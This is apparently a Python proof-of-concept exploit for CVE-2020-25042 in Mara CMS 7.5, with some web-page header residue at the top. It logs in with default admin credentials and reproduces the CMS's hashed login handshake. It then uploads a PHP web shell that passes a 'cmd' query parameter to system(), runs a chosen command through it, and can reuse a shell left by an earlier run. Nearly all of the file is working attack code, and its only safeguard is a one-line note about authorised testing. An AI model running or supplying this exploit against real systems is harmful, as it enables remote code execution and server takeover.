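# NOTE: the following lines are web-page header residue captured with the file;
# they are kept as comments so the module remains valid Python.
# 5585 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / cve_2020_25042.py PY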
from __future__ import annotations

import argparse
import base64
import hashlib
import random
import re
import string
import sys
import urllib.parse
from datetime import datetime, timezone

# `requests` and `urllib3` are third-party packages. Their absence is tolerated
# at import time so that main() can report the missing dependency cleanly
# (it checks `requests is None`) instead of dying with a traceback.
# Only ImportError is caught: any other exception raised while importing is a
# genuine fault and must not be reported as "package not installed".
try:
    import requests
    import urllib3
except ImportError:
    requests = None
    urllib3 = None


if urllib3 is not None:
    # Certificate verification is off unless --verify-tls is given, so silence
    # the per-request InsecureRequestWarning that would otherwise flood output.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ANSI SGR escape sequences. Console.color() prefixes text with one of these
# and always terminates it with RESET.
RESET, BOLD, DIM = "\033[0m", "\033[1m", "\033[2m"
RED, GREEN, YELLOW, CYAN = "\033[31m", "\033[32m", "\033[33m", "\033[36m"

# Fallback values for the command-line options declared in main().
DEFAULT_USERNAME = "admin"
DEFAULT_PASSWORD = "changeme"
DEFAULT_PAGE = "lorem.php"
DEFAULT_SHELL_NAME = "mara-poc.php"
DEFAULT_CMD = "id"
DEFAULT_TIMEOUT = 20  # seconds

# Token echoed by the default payload; shell_is_reusable() searches for it in
# the response to recognise a file left behind by an earlier run.
PAYLOAD_MARKER = "MARA_CVE_2020_25042_OK"

# USER_AGENT is installed on the HTTP session; AJAX_USER_AGENT replaces it on
# the POSTs made to codebase/handler.php during the salt and login steps.
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
AJAX_USER_AGENT = "Firefoxy"

# SHA-256 of the empty byte string, sent verbatim as the "enccrc" form field.
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()


class Console:
    """Small terminal logger with optional ANSI colour, debug and quiet modes.

    Progress messages are timestamped in UTC and written to stdout. In
    ``only_final`` mode progress output is suppressed so that stdout carries
    nothing but the final result; error messages are sent to stderr in that
    mode so a failing run is never silent.

    Attributes:
        only_final: Suppress progress logging and print only the result.
        no_color: Emit text without ANSI escape sequences. Forced on whenever
            stdout is not a terminal.
        debug_enabled: Show messages passed to ``debug()``.
    """

    def __init__(
        self,
        only_final: bool = False,
        no_color: bool = False,
        debug_enabled: bool = False,
    ) -> None:
        self.only_final = only_final
        # Escape sequences are noise in pipes and files, so colour is dropped
        # automatically when stdout is not a TTY.
        self.no_color = no_color or not sys.stdout.isatty()
        self.debug_enabled = debug_enabled

    def color(self, text: str, code: str) -> str:
        """Return *text* wrapped in the escape *code* and RESET, unless colour is off."""
        if self.no_color:
            return text
        return f"{code}{text}{RESET}"

    def log(self, marker: str, message: str, color: str = RESET) -> None:
        """Print one timestamped progress line to stdout.

        Args:
            marker: Short tag such as ``[*]`` shown before the message.
            message: Text to display.
            color: Escape code applied to the marker only.

        Does nothing when ``only_final`` is set.
        """
        if self.only_final:
            return
        # ISO-8601 in UTC with the conventional "Z" suffix instead of "+00:00".
        ts = datetime.now(timezone.utc).isoformat(timespec="seconds").replace("+00:00", "Z")
        prefix = self.color(f"[{ts}]", DIM)
        print(f"{prefix} {self.color(marker, color)} {message}", flush=True)

    def info(self, message: str) -> None:
        """Log an informational message (``[*]``, cyan)."""
        self.log("[*]", message, CYAN)

    def ok(self, message: str) -> None:
        """Log a success message (``[+]``, green)."""
        self.log("[+]", message, GREEN)

    def warn(self, message: str) -> None:
        """Log a warning message (``[!]``, yellow)."""
        self.log("[!]", message, YELLOW)

    def error(self, message: str) -> None:
        """Log a failure message (``[-]``, red).

        In ``only_final`` mode the message is written, uncoloured, to stderr:
        stdout stays reserved for the result, but the caller still learns why
        the run failed.
        """
        if self.only_final:
            print(f"[-] {message}", file=sys.stderr, flush=True)
            return
        self.log("[-]", message, RED)

    def debug(self, message: str) -> None:
        """Log a diagnostic message (``[d]``, dim) when debugging is enabled."""
        if self.debug_enabled:
            self.log("[d]", message, DIM)

    def result(self, title: str, content: str) -> None:
        """Print the final result.

        In ``only_final`` mode only the stripped *content* is printed;
        otherwise a blank line and a highlighted *title* precede the content,
        which has its trailing whitespace removed.
        """
        if self.only_final:
            print(content.strip())
            return
        print("")
        print(self.color(f"[+] {title}", BOLD + GREEN))
        print(content.rstrip())


# Module-wide logger used by the log_* helpers and by the exploit class.
# It starts with default settings; main() rebinds this name once the
# command-line flags (--only-final, --no-color, --debug) have been parsed.
console = Console()


def log_info(message: str) -> None:
    """Emit *message* as an informational line on the module-level console."""
    # `console` is looked up at call time, so the instance installed by main()
    # is the one that gets used.
    console.info(message)


def log_success(message: str) -> None:
    """Emit *message* as a success line on the module-level console."""
    console.ok(message)


def log_warning(message: str) -> None:
    """Emit *message* as a warning line on the module-level console."""
    console.warn(message)


def log_error(message: str) -> None:
    """Emit *message* as an error line on the module-level console."""
    console.error(message)


def sha256_hex(value: str) -> str:
    """Return the lowercase hexadecimal SHA-256 digest of *value* encoded as UTF-8."""
    hasher = hashlib.sha256()
    hasher.update(value.encode("utf-8"))
    return hasher.hexdigest()


def b64(value: str) -> str:
    """Return the standard Base64 text of *value* after encoding it as UTF-8."""
    encoded = base64.b64encode(value.encode("utf-8"))
    return str(encoded, "ascii")


def b64_decode(value: str) -> str:
    """Decode Base64 text *value* and return the result as a string.

    Decoding is lenient (``validate=False``), and bytes of the decoded data
    that are not valid UTF-8 are dropped rather than raising.

    Raises:
        UnicodeEncodeError: If *value* contains non-ASCII characters.
        binascii.Error: If *value* is not correctly padded Base64.
    """
    raw = base64.b64decode(value.encode("ascii"), validate=False)
    return raw.decode("utf-8", errors="ignore")


def random_php_name() -> str:
    """Return a file name of the form ``mara-poc-<8 chars>.php``.

    The eight characters are drawn from lowercase ASCII letters and digits
    using the module-level ``random`` generator.
    """
    alphabet = string.ascii_lowercase + string.digits
    token = "".join(random.choices(alphabet, k=8))
    return "mara-poc-" + token + ".php"


def ensure_scheme(url: str) -> str:
    """Return *url* with an explicit scheme, defaulting to ``http://``.

    Surrounding whitespace is removed first. A URL that already begins with
    ``http://`` or ``https://`` is returned otherwise unchanged. The check is
    case-insensitive because URI schemes are, so ``HTTP://host`` is not
    prefixed a second time.

    Args:
        url: A URL or bare ``host[:port][/path]`` string.

    Returns:
        The trimmed URL, prefixed with ``http://`` when it had no HTTP(S) scheme.
    """
    candidate = url.strip()
    if candidate.lower().startswith(("http://", "https://")):
        return candidate
    return f"http://{candidate}"


def default_payload() -> str:
    """Return the built-in PHP test payload as source text.

    The script prints PAYLOAD_MARKER followed by a newline and, when a ``cmd``
    query parameter is present, passes it to PHP's ``system()``.
    """
    source_lines = (
        "<?php",
        f'echo "{PAYLOAD_MARKER}\\n";',
        'if (isset($_GET["cmd"])) {',
        '    system($_GET["cmd"]);',
        "}",
        "?>",
    )
    # Every line, including the last, is newline-terminated.
    return "\n".join(source_lines) + "\n"


class MaraCMSCVE202025042:
    """Proof-of-concept driver for CVE-2020-25042 (Mara CMS authenticated upload).

    One instance holds the target settings, an HTTP session and the values
    collected during login. ``run()`` performs the whole flow: optionally
    reuse a previously uploaded file, otherwise log in, upload the payload and
    (optionally) request it with a command.

    Most failure paths log an error and terminate the process with exit
    status 1 rather than raising.

    Intended only for systems you are authorised to test.
    """

    def __init__(
        self,
        base_url: str,
        page: str,
        username: str,
        password: str,
        shell_name: str,
        command: str,
        destdir: str,
        shell_url_path: str | None,
        payload: str,
        timeout: int,
        verify_tls: bool,
        force_upload: bool,
    ) -> None:
        """Store the run configuration and create the HTTP session.

        Args:
            base_url: CMS base URL; a scheme is added if missing and trailing
                slashes are removed.
            page: CMS page requested to bootstrap the login; leading slashes
                are removed.
            username: CMS account name.
            password: CMS account password.
            shell_name: File name used for the uploaded payload.
            command: Value sent as the ``cmd`` query parameter after upload.
            destdir: Raw ``destdir`` form value sent with the upload.
            shell_url_path: Optional override for where the uploaded file is
                reachable (absolute URL, origin-relative or base-relative path).
            payload: Text content of the file to upload.
            timeout: Timeout passed to every HTTP request.
            verify_tls: Whether TLS certificates are verified.
            force_upload: Skip the "existing shell" check and always upload.
        """
        self.base_url = ensure_scheme(base_url).rstrip("/")
        self.page = page.lstrip("/")
        self.username = username
        self.password = password
        self.shell_name = shell_name
        self.command = command
        self.destdir = destdir
        self.shell_url_path = shell_url_path
        self.payload = payload
        self.timeout = timeout
        self.verify_tls = verify_tls
        self.force_upload = force_upload

        # A single session is reused for every request, so cookies set by the
        # server carry over from one step to the next.
        self.session = requests.Session()
        self.session.headers.update({"User-Agent": USER_AGENT})
        # Values filled in during login(); empty until then.
        self.shash = ""
        self.nacl = ""
        self.password_hash = ""
        self.salted_password_hash = ""
        # Default upload directory; replaced if the login page declares `imgdir`.
        self.imgdir = "img/"
        # Raw body of the last "setsalt" response, echoed back in the login request.
        self.last_raw_response = ""

    def url(self, path: str) -> str:
        """Return *path* joined onto the CMS base URL with exactly one slash."""
        return f"{self.base_url}/{path.lstrip('/')}"

    def origin_url(self, path: str) -> str:
        """Return *path* joined onto the scheme and host of the base URL.

        Unlike ``url()``, any path component of the base URL is discarded.
        """
        parsed = urllib.parse.urlparse(self.base_url)
        origin = f"{parsed.scheme}://{parsed.netloc}"
        return f"{origin}/{path.lstrip('/')}"

    def request(
        self,
        method: str,
        path: str,
        *,
        params: dict[str, str] | None = None,
        data: dict[str, str] | list[tuple[str, str]] | None = None,
        files: dict[str, tuple[str, str, str]] | None = None,
        headers: dict[str, str] | None = None,
        allow_redirects: bool = True,
    ) -> requests.Response:
        """Send an HTTP request to a path below the base URL.

        Args:
            method: HTTP method name.
            path: Path relative to the CMS base URL.
            params: Query-string parameters.
            data: Form fields, as a mapping or an ordered list of pairs.
            files: Multipart file parts in the ``requests`` tuple format.
            headers: Per-request headers merged over the session headers.
            allow_redirects: Whether redirects are followed.

        Returns:
            The response object, whatever its status code.

        A transport-level failure (``requests.RequestException``) is logged
        and terminates the process with exit status 1.
        """
        target = self.url(path)
        console.debug(f"{method.upper()} {target}")

        try:
            response = self.session.request(
                method=method,
                url=target,
                params=params,
                data=data,
                files=files,
                headers=headers,
                timeout=self.timeout,
                allow_redirects=allow_redirects,
                verify=self.verify_tls,
            )
        except requests.RequestException as error:
            log_error(f"Request failed: {error}")
            sys.exit(1)

        console.debug(f"HTTP {response.status_code} from {response.url}")
        return response

    def ajax_fields(
        self,
        action: str,
        *,
        usr: str = "",
        password_hash: str = "",
        salted_password_hash: str = "",
        authenticated: str = "",
        rawresponse: str = "",
        response: str = "",
        status: str = "Sending Request",
    ) -> dict[str, str]:
        """Build the form fields for a POST to ``codebase/handler.php``.

        Every value is Base64-encoded except ``enccrc``, which is the SHA-256
        hex digest of the empty string. Fields not exposed as parameters are
        sent as encoded empty strings.

        Args:
            action: Handler action name (this file uses "setsalt" and "login").
            usr: Account name.
            password_hash: Sent as the ``hash`` field.
            salted_password_hash: Sent as the ``pwd`` field.
            authenticated: Sent as the ``authenticated`` field.
            rawresponse: Sent as the ``rawresponse`` field.
            response: Sent as the ``response`` field.
            status: Sent as the ``status`` field.

        Returns:
            A mapping of field name to encoded value.
        """
        # NOTE(review): the field set presumably mirrors what the CMS's own
        # client-side code submits - confirm against the target version.
        return {
            "usr": b64(usr),
            "hash": b64(password_hash),
            "pwd": b64(salted_password_hash),
            "authenticated": b64(authenticated),
            "action": b64(action),
            "headsection": b64(""),
            "data": b64(""),
            "enccrc": EMPTY_SHA256,
            "crc": b64(""),
            "srcfile": b64(""),
            "destfile": b64(""),
            "rawresponse": b64(rawresponse),
            "response": b64(response),
            "status": b64(status),
            "error": b64(""),
        }

    def parse_ajax_response(self, text: str) -> str:
        """Extract and decode the payload of a handler response.

        The body is split on the ``~::~`` delimiter; the second segment is
        Base64-decoded and returned.

        Returns:
            The decoded text, or ``""`` when there are fewer than three
            segments, the second segment is empty, or decoding fails.
        """
        parts = text.split("~::~")
        if len(parts) < 3 or not parts[1]:
            return ""
        try:
            return b64_decode(parts[1])
        except Exception:
            # Undecodable content is treated the same as a missing payload.
            return ""

    def load_login_page(self) -> None:
        """Fetch the bootstrap page and scrape the values needed for login.

        Requests ``self.page`` with ``?login=<username>`` and extracts the
        ``shash`` value from the page source (required) and the ``imgdir``
        JavaScript variable (optional; the default is kept when absent).

        Exits with status 1 if the page does not return HTTP 200 or no
        ``shash`` is found.
        """
        log_info("Loading Mara CMS page and collecting session data")

        response = self.request(
            "GET",
            self.page,
            params={"login": self.username},
        )

        if response.status_code != 200:
            log_error(f"Could not load login page | HTTP {response.status_code}")
            sys.exit(1)

        # Matches shash='...' or shash="..." anywhere in the page source.
        shash_match = re.search(r"shash=['\"]([^'\"]+)['\"]", response.text)
        if not shash_match:
            log_error("Could not find shash in page source")
            sys.exit(1)

        imgdir_match = re.search(r"var\s+imgdir=['\"]([^'\"]+)['\"]", response.text)
        if imgdir_match and imgdir_match.group(1):
            self.imgdir = imgdir_match.group(1)

        self.shash = shash_match.group(1)
        log_success(f"Found shash: {self.shash}")
        console.debug(f"Image directory: {self.imgdir}")

    def get_salt(self) -> None:
        """Request a login salt from the handler and store it.

        POSTs the "setsalt" action to ``codebase/handler.php``. The decoded
        response is stored in ``self.nacl`` and the raw response body in
        ``self.last_raw_response``.

        Exits with status 1 on a non-200 response or an unparsable body.
        """
        log_info("Requesting login salt")

        response = self.request(
            "POST",
            "codebase/handler.php",
            # Random query value so the request URL is unique each time.
            params={"nocache": str(random.random())},
            data=self.ajax_fields("setsalt"),
            headers={
                "User-Agent": AJAX_USER_AGENT,
                "Content-Type": "application/x-www-form-urlencoded",
            },
        )

        if response.status_code != 200:
            log_error(f"Could not get salt | HTTP {response.status_code}")
            sys.exit(1)

        salt = self.parse_ajax_response(response.text)
        if not salt:
            log_error("Could not parse salt from handler response")
            console.debug(response.text[:300].replace("\n", " "))
            sys.exit(1)

        self.nacl = salt
        self.last_raw_response = response.text
        log_success(f"Got salt: {self.nacl}")

    def login(self) -> None:
        """Authenticate against the CMS with the configured credentials.

        Runs ``load_login_page()`` and ``get_salt()``, derives the two hashes
        and POSTs the "login" action:

        * ``password_hash`` = SHA-256(password + shash + username)
        * ``salted_password_hash`` = SHA-256(password_hash + salt)

        Login counts as successful when the response is HTTP 200 and the
        decoded payload starts with ``OK``; otherwise the process exits with
        status 1.
        """
        self.load_login_page()
        self.get_salt()

        self.password_hash = sha256_hex(f"{self.password}{self.shash}{self.username}")
        self.salted_password_hash = sha256_hex(f"{self.password_hash}{self.nacl}")

        log_info(f"Logging in as {self.username}")

        response = self.request(
            "POST",
            "codebase/handler.php",
            params={"nocache": str(random.random())},
            data=self.ajax_fields(
                "login",
                usr=self.username,
                password_hash=self.password_hash,
                salted_password_hash=self.salted_password_hash,
                # The raw body of the setsalt response is sent back unchanged.
                rawresponse=self.last_raw_response,
            ),
            headers={
                "User-Agent": AJAX_USER_AGENT,
                "Content-Type": "application/x-www-form-urlencoded",
            },
        )

        decoded = self.parse_ajax_response(response.text)
        if response.status_code != 200 or not decoded.startswith("OK"):
            log_error("Login failed")
            if decoded:
                log_error(f"Handler response: {decoded}")
            else:
                console.debug(response.text[:300].replace("\n", " "))
            sys.exit(1)

        log_success(f"Login successful: {decoded}")

    def open_upload_form(self) -> None:
        """Request the upload form page and its iframe variant.

        Both are GETs to ``codebase/dir.php`` with ``type=filenew``; the second
        adds ``iframe=1``. The response bodies are not used, and a non-200
        status only produces a warning.
        """
        # NOTE(review): presumably replays the browser's navigation before the
        # upload; whether the server requires it is not visible here.
        log_info("Opening upload form")

        first = self.request("GET", "codebase/dir.php", params={"type": "filenew"})
        if first.status_code != 200:
            log_warning(f"Upload page returned HTTP {first.status_code}")

        iframe = self.request(
            "GET",
            "codebase/dir.php",
            params={"iframe": "1", "type": "filenew"},
        )
        if iframe.status_code != 200:
            log_warning(f"Upload iframe returned HTTP {iframe.status_code}")

    def upload_shell(self) -> None:
        """Upload the payload as ``self.shell_name`` via a multipart POST.

        The file is sent as the ``files[]`` part to ``codebase/handler.php``
        together with the form fields below. HTTP 200 and 302 are accepted;
        any other status logs the start of the body and exits with status 1.
        The response content itself is not inspected for success.
        """
        log_info(f"Uploading PHP payload as {self.shell_name}")

        # An ordered list of pairs (not a dict) keeps field order and allows
        # the repeated "authenticated" entry.
        # NOTE(review): "authenticated" appears twice; presumably this mirrors
        # the original form - left untouched.
        form = [
            ("authenticated", b64("1")),
            ("action", b64("upload")),
            ("MAX_FILE_SIZE", "10485760"),
            ("type", "filenew"),
            ("usr", b64(self.username)),
            ("pwd", b64(self.salted_password_hash)),
            ("authenticated", b64("1")),
            ("destdir", self.destdir),
        ]

        # (file name, content, content type) in the `requests` tuple format.
        files = {
            "files[]": (
                self.shell_name,
                self.payload,
                "application/x-php",
            )
        }

        response = self.request(
            "POST",
            "codebase/handler.php",
            data=form,
            files=files,
            headers={"Referer": self.url("codebase/dir.php?type=filenew")},
        )

        if response.status_code not in (200, 302):
            log_error(f"Upload failed | HTTP {response.status_code}")
            if response.text:
                log_error(response.text[:300].replace("\n", " "))
            sys.exit(1)

        log_success("Upload request completed")
        console.debug(response.text[:300].replace("\n", " "))

    def shell_url(self) -> str:
        """Return the URL at which the uploaded file is expected.

        Resolution order:

        1. ``shell_url_path`` if set: used as-is when it is an absolute URL,
           resolved against the origin when it starts with ``/``, otherwise
           resolved against the base URL.
        2. ``<destdir>/<shell_name>`` below the base URL when ``destdir`` is set.
        3. ``<imgdir>/<shell_name>`` below the base URL otherwise.

        If the chosen directory is empty after stripping slashes, the file is
        placed directly under the base URL.
        """
        if self.shell_url_path:
            parsed = urllib.parse.urlparse(self.shell_url_path)
            if parsed.scheme and parsed.netloc:
                return self.shell_url_path
            if self.shell_url_path.startswith("/"):
                return self.origin_url(self.shell_url_path)
            return self.url(self.shell_url_path)

        if self.destdir:
            path = self.destdir.strip("/")
        else:
            path = self.imgdir.strip("/")

        if path:
            return self.url(f"{path}/{self.shell_name}")
        return self.url(self.shell_name)

    def execute_command(self) -> None:
        """Request the uploaded file with ``cmd=<command>`` and print the output.

        The session is called directly (not ``request()``) because
        ``shell_url()`` already yields an absolute URL. A transport error or a
        non-200 status is logged and exits with status 1.
        """
        shell_url = self.shell_url()
        log_success(f"Shell URL: {shell_url}")
        log_info(f"Executing command: {self.command}")

        try:
            response = self.session.get(
                shell_url,
                params={"cmd": self.command},
                timeout=self.timeout,
                verify=self.verify_tls,
            )
        except requests.RequestException as error:
            log_error(f"Command request failed: {error}")
            sys.exit(1)

        if response.status_code != 200:
            log_error(f"Command execution failed | HTTP {response.status_code}")
            if response.text:
                log_error(response.text[:300].replace("\n", " "))
            sys.exit(1)

        console.result("Command output", response.text)

    def shell_is_reusable(self) -> bool:
        """Report whether a usable payload already exists at ``shell_url()``.

        Sends a probe request with ``cmd=echo reusable`` and returns True only
        when the response is HTTP 200 and contains PAYLOAD_MARKER. Unlike the
        other steps, failures here are logged at debug level and never exit.
        """
        # Before login() has run, self.imgdir still holds its default value,
        # so the probe targets the default location unless destdir or
        # shell_url_path was supplied.
        shell_url = self.shell_url()
        log_info(f"Checking existing shell: {shell_url}")

        try:
            response = self.session.get(
                shell_url,
                params={"cmd": "echo reusable"},
                timeout=self.timeout,
                verify=self.verify_tls,
            )
        except requests.RequestException as error:
            console.debug(f"Reusable shell check failed: {error}")
            return False

        if response.status_code != 200:
            console.debug(f"Reusable shell check returned HTTP {response.status_code}")
            return False

        if PAYLOAD_MARKER not in response.text:
            console.debug("Reusable shell marker was not found")
            return False

        log_success("Existing shell is reusable")
        return True

    def run(self, execute: bool) -> None:
        """Run the full flow.

        Unless ``force_upload`` is set, an existing reusable file short-cuts
        the login and upload. Otherwise the sequence is login, open the upload
        form, upload.

        Args:
            execute: When true, finish by running ``execute_command()``;
                when false, only report the file's URL.
        """
        if not self.force_upload and self.shell_is_reusable():
            if execute:
                self.execute_command()
            else:
                log_success(f"Reusable shell: {self.shell_url()}")
            return

        self.login()
        self.open_upload_form()
        self.upload_shell()

        if execute:
            self.execute_command()
            return

        log_success(f"Uploaded shell: {self.shell_url()}")


def read_payload(path: str | None) -> str:
    """Return the payload text to upload.

    Args:
        path: Path of a custom payload file, or a falsy value to use the
            built-in default payload.

    Returns:
        The file's content decoded as UTF-8, or ``default_payload()``.

    A file that cannot be opened, read or decoded is reported through
    ``log_error`` and terminates the process with exit status 1.
    """
    if not path:
        return default_payload()

    try:
        with open(path, "r", encoding="utf-8") as file:
            return file.read()
    except (OSError, UnicodeDecodeError) as error:
        # UnicodeDecodeError is a ValueError, not an OSError; without catching
        # it a non-UTF-8 file would escape as an unhandled traceback.
        log_error(f"Could not read payload file: {error}")
        sys.exit(1)


def _build_parser() -> argparse.ArgumentParser:
    """Assemble the argument parser describing every supported CLI option."""
    cli = argparse.ArgumentParser(
        description="CVE-2020-25042 Mara CMS 7.5 authenticated arbitrary PHP upload PoC"
    )
    add = cli.add_argument

    # Target and credentials.
    add("--url", required=True, help="Mara CMS base URL. Example: http://target/cms")
    add(
        "--page",
        default=DEFAULT_PAGE,
        help=f"Existing CMS page used for login bootstrap. Default: {DEFAULT_PAGE}",
    )
    add("--username", default=DEFAULT_USERNAME, help=f"CMS username. Default: {DEFAULT_USERNAME}")
    add("--password", default=DEFAULT_PASSWORD, help=f"CMS password. Default: {DEFAULT_PASSWORD}")

    # Upload and execution.
    add(
        "--shell-name",
        default=DEFAULT_SHELL_NAME,
        help=f"Name for uploaded PHP file. Default: {DEFAULT_SHELL_NAME}",
    )
    add("--cmd", default=DEFAULT_CMD, help=f"Command to run after upload. Default: {DEFAULT_CMD}")
    add(
        "--destdir",
        default="",
        help="Raw upload destdir form value. Default leaves Mara CMS using img/",
    )
    add(
        "--shell-url-path",
        help="Override shell URL/path if the file is exposed outside img/. Example: /cms/webshell.php",
    )
    add(
        "--payload-file",
        help="Custom PHP payload file to upload. Default payload runs commands from ?cmd=",
    )
    add("--upload-only", action="store_true", help="Upload payload but do not execute --cmd")
    add(
        "--force-upload",
        action="store_true",
        help="Always login and upload the payload, even if a reusable shell exists",
    )

    # Transport.
    add(
        "--timeout",
        type=int,
        default=DEFAULT_TIMEOUT,
        help=f"HTTP timeout in seconds. Default: {DEFAULT_TIMEOUT}",
    )
    add("--verify-tls", action="store_true", help="Verify TLS certificates")

    # Output.
    add(
        "--only-final",
        action="store_true",
        help="Hide progress logs and print only command output",
    )
    add("--no-color", action="store_true", help="Disable ANSI colors")
    add("--debug", action="store_true", help="Show request URLs and handler snippets")

    return cli


def main() -> None:
    """Command-line entry point.

    Parses the arguments, installs a Console configured from the output flags,
    validates the environment and input, then builds the exploit object and
    runs it. Exits with status 2 when ``requests`` is unavailable and status 1
    when ``--shell-name`` does not end in ``.php``.
    """
    global console

    opts = _build_parser().parse_args()

    # Replace the default module-level console before anything is logged.
    console = Console(
        debug_enabled=opts.debug,
        no_color=opts.no_color,
        only_final=opts.only_final,
    )

    if requests is None:
        log_error("Missing dependency: requests. Install it with: pip install requests")
        sys.exit(2)

    if not opts.shell_name.endswith(".php"):
        log_error("--shell-name must end with .php")
        sys.exit(1)

    settings = {
        "base_url": opts.url,
        "page": opts.page,
        "username": opts.username,
        "password": opts.password,
        "shell_name": opts.shell_name,
        "command": opts.cmd,
        "destdir": opts.destdir,
        "shell_url_path": opts.shell_url_path,
        "payload": read_payload(opts.payload_file),
        "timeout": opts.timeout,
        "verify_tls": opts.verify_tls,
        "force_upload": opts.force_upload,
    }
    runner = MaraCMSCVE202025042(**settings)

    # --upload-only stops after the upload; otherwise --cmd is executed.
    runner.run(execute=not opts.upload_only)


# Run the command-line interface only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()